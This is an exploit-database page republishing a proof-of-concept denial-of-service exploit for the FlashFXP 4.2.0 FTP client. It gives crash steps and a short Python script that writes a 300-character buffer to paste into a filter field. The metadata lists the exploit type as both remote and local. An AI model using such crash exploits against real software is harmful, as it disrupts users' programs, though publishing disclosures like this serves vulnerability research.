Advertisement






FlashFXP 4.2.0 Build 1730 Denial of Service (PoC)

CVE Category Price Severity
N/A CWE-399 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2020-03-31
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030188

Below is a copy:

FlashFXP 4.2.0 Build 1730 Denial of Service (PoC)
# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC) 
# Vendor Homepage: https://www.flashfxp.com/ 
# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-03-30
# Vulnerable Software: FlashFXP
# Version: 4.2.0 Build 1730
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 10 Pro (64 bit) 

#Steps to Produce the Crash:

#   1.- Run python code: FlashCrash.py
#   2.- Copy content to clipboard
#   3.- Open "FlashFXP.exe"
#   4.- Go to "Options" > Filters > Skip List > New Entry
#   5.- Paste ClipBoard into the "Mask" field
#   6.- Click on OK
#   7.- Go to "Options" > Filters > Skip List
#   8.- Crashed

#################################################################################################################################################

#Python "FlashCrash.py" Code:
   
buffer = "\x41" * 300
f = open ("FlashCrash.txt", "w")
f.write(buffer)
f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum